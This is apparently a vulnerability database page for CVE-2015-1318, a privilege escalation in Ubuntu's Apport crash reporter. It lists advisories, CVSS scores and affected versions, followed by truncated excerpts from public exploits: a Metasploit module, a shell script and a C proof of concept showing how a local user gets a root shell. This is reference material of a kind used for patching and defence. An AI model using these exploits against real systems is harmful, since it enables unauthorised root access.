CVE-2015-1318
Published 2015-04-17
CVE-2015-1318: The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a…
Priority P340 · high · 7.2 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 4.08% (89.4th percentile)
The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apport_project | apport | — | — |
| apport_project | apport | >= 0 < 2.14.1-0ubuntu3.9 | 2.14.1-0ubuntu3.9 |
CVSS provenance
nvd · v2.0 · 7.2 HIGH · AV:L/AC:L/Au:N/C:C/I:C/A:C
osv · 7.2 HIGH
Ubuntu
Apport vulnerability
vendor_ubuntu·2015-04-14
Title: Apport vulnerability
Summary: Apport could be tricked into running programs as an administrator.
Stéphane Graber and Tavis Ormandy independently discovered that Apport
incorrectly handled the crash reporting feature. A local attacker could use
this issue to gain elevated privileges.
Instructions: In general, a standard system update will make all the necessary changes.
GHSA
GHSA-cpww-w9jx-qp3p: The crash reporting feature in Apport 2
ghsa_unreviewed·2022-05-14
CVE-2015-1318 [HIGH] GHSA-cpww-w9jx-qp3p: The crash reporting feature in Apport 2
The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).
OSV
CVE-2015-1318: The crash reporting feature in Apport 2
osv·2015-04-14·CVSS 7.2
CVE-2015-1318 [HIGH] CVE-2015-1318: The crash reporting feature in Apport 2
The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).
No detection rules found.
Exploit-DB
Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)
exploitdb·2018-02-05
CVE-2015-1318 Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Apport / ABRT chroot Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Linux systems by
invoking the default coredump handler inside a namespace ("container").
Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
vulnerable, due to a feature which allows forwarding reports to
a container's Apport by changing the root directory before loading
the crash report, causing 'usr/share/apport/apport' within the crashed
task's directory to be executed.
Similarly, Fedora is vulnerable when the kernel crash handler is
```
Exploit-DB
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
exploitdb·2015-04-17·CVSS 7.2
CVE-2015-1318 [HIGH] Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
---
```sh
#!/bin/sh
#
# CVE-2015-1318
#
# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
#
# Example:
#
# % uname -a
# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
#
# % lsb_release -a
# No LSB modules are available.
# Distributor ID: Ubuntu
# Description: Ubuntu 14.04.2 LTS
# Release: 14.04
# Codename: trusty
#
# % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }'
# apport 2.14.1-0ubuntu3.8
#
# % id
# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)
#
# % ./apport.sh
# pwned-4.3# id
# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)
# pwned-4.3# exit
TEMPDIR=$(mktemp -d)
cd ${TEMPDIR}
cp /bin/busy
```
Exploit-DB
Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
exploitdb·2015-04-14·CVSS 7.2
CVE-2015-1862 [HIGH] Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
---
```c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
# warning this file must be compiled with -static
//
// Apport/Abrt Vulnerability Demo Exploit.
//
// Apport: CVE-2015-1318
// Abrt: CVE-2015-1862
//
// -- [email protected], April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To get libc.a,
// yum install glibc-static or apt-get install libc6-dev
//
int main(int argc, char **argv)
{
    int status;
    Elf32_Phdr *hdr;
    pid_t wrapper;
    pid_t init;
    pid_t subprocess;
    unsigned i;
    // Verify this is a static executable by checking the program headers for a
    // d
```
Metasploit
Apport / ABRT chroot Privilege Escalation
metasploit
This module attempts to gain root privileges on Linux systems by invoking the default coredump handler inside a namespace ("container"). Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing `usr/share/apport/apport` within the crashed task's directory to be executed. Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be executed. In both instances, the crash handler does not drop privileges, resulting in code execution as root. This mod
No writeups or analysis indexed.
http://www.osvdb.org/120803
http://www.ubuntu.com/usn/USN-2569-1
https://bugs.launchpad.net/ubuntu/%2Bsource/apport/%2Bbug/1438758
https://launchpad.net/apport/trunk/2.17.1
https://www.exploit-db.com/exploits/36782/
https://www.exploit-db.com/exploits/43971/
http://seclists.org/fulldisclosure/2025/Jun/9